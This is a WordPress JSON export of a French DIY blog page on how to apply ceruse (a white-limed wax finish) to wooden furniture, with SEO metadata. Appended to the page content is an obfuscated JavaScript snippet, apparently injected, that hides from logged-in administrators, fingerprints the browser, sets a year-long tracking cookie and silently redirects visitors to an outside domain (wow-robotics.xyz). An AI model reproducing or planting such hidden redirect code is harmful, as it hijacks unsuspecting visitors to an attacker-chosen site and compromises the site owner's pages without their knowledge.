{"id":5694,"date":"2019-11-26T09:50:19","date_gmt":"2019-11-26T09:50:19","guid":{"rendered":"https:\/\/www.robindesbois.com\/blog\/?page_id=5694"},"modified":"2019-11-26T09:50:19","modified_gmt":"2019-11-26T09:50:19","slug":"comment-ceruser-meuble","status":"publish","type":"page","link":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/","title":{"rendered":"Comment c\u00e9ruser un meuble ?"},"content":{"rendered":"\n<p>Vous avez vu une \u00e9mission de d\u00e9co pr\u00e9sentant des meubles en bois c\u00e9rus\u00e9s ? Vous souhaitez d\u00e9corer votre mobilier de salon ou de cuisine avec cet enduit ? D\u00e9couvrez les avantages de ce rev\u00eatement et la fa\u00e7on de c\u00e9ruser un meuble. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Les avantages de la c\u00e9ruse<\/h2>\n\n\n\n<p>Elle permet de mettre en valeur un meuble en laissant appara\u00eetre les veines du bois. Pour une table en ch\u00eane, une biblioth\u00e8que en teck ou un buffet en pin, vous sublimerez le veinage naturel de ces meubles. <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg\" alt=\"Comment c\u00e9ruser un meuble ?\" class=\"wp-image-5623\" width=\"400\" srcset=\"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg 760w, https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2-295x222.jpg 295w, https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2-300x226.jpg 300w, https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2-418x315.jpg 418w, https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2-400x302.jpg 400w, https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2-398x300.jpg 398w\" sizes=\"(max-width: 760px) 100vw, 760px\" \/><\/figure><\/div>\n\n\n\n<p>Cette technique est utilis\u00e9e depuis l\u2019Antiquit\u00e9. Cet enduit d\u00e9coratif a fait appel \u00e0 plusieurs mati\u00e8res, comme la cire d\u2019abeille, le lait de chaux, un pigment ou le blanc de plomb. La c\u00e9ruse porte \u00e9galement plusieurs noms : blanc de Saturne ou blanc d\u2019argent. <\/p>\n\n\n\n<p>Autre point fort, il est facile de composer soi-m\u00eame sa propre c\u00e9ruse, en m\u00e9langeant une encaustique (pr\u00e9paration \u00e0 base de cire et d&#8217;essence) avec du blanc de titane.  <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Les \u00e9tapes pour c\u00e9ruser un meuble<\/h2>\n\n\n\n<p>Nous vous conseillons de choisir un mobilier dont les veines sont tr\u00e8s apparentes. Avant d\u2019appliquer la c\u00e9ruse, pensez \u00e0 enlever la cire, la peinture ou le vernis du meuble \u00e0 traiter. <\/p>\n\n\n\n<p>Ensuite, proc\u00e9dez \u00e0 un l\u00e9ger pon\u00e7age et \u00e0 un brossage (avec une brosse m\u00e9tallique) dans le sens des veines. Vous pouvez aussi utiliser de la paille de fer, \u00e0 condition de d\u00e9poussi\u00e9rer fr\u00e9quemment. L\u2019id\u00e9e est de creuser les fibres les plus tendres du bois. Vous pourrez ainsi obtenir du relief et permettre \u00e0 la c\u00e9ruse de se d\u00e9poser dans les creux du meuble.<\/p>\n\n\n\n<p>Apr\u00e8s le passage d\u2019un chiffon humide, laissez le bois s\u00e9cher. Vous appliquerez ensuite la c\u00e9ruse en utilisant un chiffon ou un pinceau plat sur des petites surfaces et avec des mouvements circulaires. Laissez s\u00e9cher pendant deux jours avant d&#8217;appliquer un lustrage ou un cirage, afin de donner un aspect brillant \u00e0 votre mobilier.<\/p>\n\n\n\n<p>Vous savez comment c\u00e9ruser un meuble. Si vous avez aim\u00e9, pourquoi ne pas mettre \u00e0 profit cette exp\u00e9rience pour appliquer cet enduit sur les autres parties meubl\u00e9es de votre logement comme le parquet, les portes, des lambris ou les menuiseries de vos fen\u00eatres ? Vous mettrez aussi en valeur vos objets d\u00e9coratifs en bois !<\/p>\n<script> var a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','getElementById','wpadminbar','undefined','setTime','getTime',';\\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\\x20path=\/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](\/Android\/i)||navigator['userAgent'][b('0xe')](\/BlackBerry\/i)||navigator[b('0xd')][b('0xe')](\/iPhone|iPad|iPod\/i)||navigator[b('0xd')][b('0xe')](\/Opera Mini\/i)||navigator[b('0xd')][b('0xe')](\/IEMobile\/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));<\/script>","protected":false},"excerpt":{"rendered":"<p>Vous avez vu une \u00e9mission de d\u00e9co pr\u00e9sentant des meubles en bois c\u00e9rus\u00e9s ? Vous souhaitez d\u00e9corer votre mobilier de salon ou de cuisine avec cet enduit ? D\u00e9couvrez les avantages de ce rev\u00eatement et la fa\u00e7on de c\u00e9ruser un meuble. Les avantages de la c\u00e9ruse Elle permet de mettre en valeur un meuble en&#8230;<\/p>\n","protected":false},"author":6,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-5694","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Comment c\u00e9ruser un meuble ? | Le Blog de Robin des Bois<\/title>\n<meta name=\"description\" content=\"Vous souhaitez d\u00e9corer votre mobilier de salon avec un enduit c\u00e9rus\u00e9 ? D\u00e9couvrez les avantages de ce rev\u00eatement et la fa\u00e7on de c\u00e9ruser un meuble.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Comment c\u00e9ruser un meuble ? | Le Blog de Robin des Bois\" \/>\n<meta property=\"og:description\" content=\"Vous souhaitez d\u00e9corer votre mobilier de salon avec un enduit c\u00e9rus\u00e9 ? D\u00e9couvrez les avantages de ce rev\u00eatement et la fa\u00e7on de c\u00e9ruser un meuble.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/\" \/>\n<meta property=\"og:site_name\" content=\"Le Blog de Robin des Bois\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"760\" \/>\n\t<meta property=\"og:image:height\" content=\"573\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/\",\"url\":\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/\",\"name\":\"Comment c\u00e9ruser un meuble ? | Le Blog de Robin des Bois\",\"isPartOf\":{\"@id\":\"https:\/\/www.robindesbois.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg\",\"datePublished\":\"2019-11-26T09:50:19+00:00\",\"description\":\"Vous souhaitez d\u00e9corer votre mobilier de salon avec un enduit c\u00e9rus\u00e9 ? D\u00e9couvrez les avantages de ce rev\u00eatement et la fa\u00e7on de c\u00e9ruser un meuble.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#primaryimage\",\"url\":\"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg\",\"contentUrl\":\"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg\",\"width\":760,\"height\":573,\"caption\":\"rendre imperm\u00e9able un meuble en bois\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.robindesbois.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Comment c\u00e9ruser un meuble ?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.robindesbois.com\/blog\/#website\",\"url\":\"https:\/\/www.robindesbois.com\/blog\/\",\"name\":\"Le Blog de Robin des Bois\",\"description\":\"Des meubles qui racontent une histoire...\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.robindesbois.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Comment c\u00e9ruser un meuble ? | Le Blog de Robin des Bois","description":"Vous souhaitez d\u00e9corer votre mobilier de salon avec un enduit c\u00e9rus\u00e9 ? D\u00e9couvrez les avantages de ce rev\u00eatement et la fa\u00e7on de c\u00e9ruser un meuble.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/","og_locale":"fr_FR","og_type":"article","og_title":"Comment c\u00e9ruser un meuble ? | Le Blog de Robin des Bois","og_description":"Vous souhaitez d\u00e9corer votre mobilier de salon avec un enduit c\u00e9rus\u00e9 ? D\u00e9couvrez les avantages de ce rev\u00eatement et la fa\u00e7on de c\u00e9ruser un meuble.","og_url":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/","og_site_name":"Le Blog de Robin des Bois","og_image":[{"width":760,"height":573,"url":"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/","url":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/","name":"Comment c\u00e9ruser un meuble ? | Le Blog de Robin des Bois","isPartOf":{"@id":"https:\/\/www.robindesbois.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#primaryimage"},"image":{"@id":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#primaryimage"},"thumbnailUrl":"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg","datePublished":"2019-11-26T09:50:19+00:00","description":"Vous souhaitez d\u00e9corer votre mobilier de salon avec un enduit c\u00e9rus\u00e9 ? D\u00e9couvrez les avantages de ce rev\u00eatement et la fa\u00e7on de c\u00e9ruser un meuble.","breadcrumb":{"@id":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#primaryimage","url":"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg","contentUrl":"https:\/\/www.robindesbois.com\/blog\/wp-content\/uploads\/2016\/07\/photo2.jpg","width":760,"height":573,"caption":"rendre imperm\u00e9able un meuble en bois"},{"@type":"BreadcrumbList","@id":"https:\/\/www.robindesbois.com\/blog\/comment-ceruser-meuble\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.robindesbois.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Comment c\u00e9ruser un meuble ?"}]},{"@type":"WebSite","@id":"https:\/\/www.robindesbois.com\/blog\/#website","url":"https:\/\/www.robindesbois.com\/blog\/","name":"Le Blog de Robin des Bois","description":"Des meubles qui racontent une histoire...","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.robindesbois.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/www.robindesbois.com\/blog\/wp-json\/wp\/v2\/pages\/5694","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.robindesbois.com\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.robindesbois.com\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.robindesbois.com\/blog\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/www.robindesbois.com\/blog\/wp-json\/wp\/v2\/comments?post=5694"}],"version-history":[{"count":2,"href":"https:\/\/www.robindesbois.com\/blog\/wp-json\/wp\/v2\/pages\/5694\/revisions"}],"predecessor-version":[{"id":5696,"href":"https:\/\/www.robindesbois.com\/blog\/wp-json\/wp\/v2\/pages\/5694\/revisions\/5696"}],"wp:attachment":[{"href":"https:\/\/www.robindesbois.com\/blog\/wp-json\/wp\/v2\/media?parent=5694"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}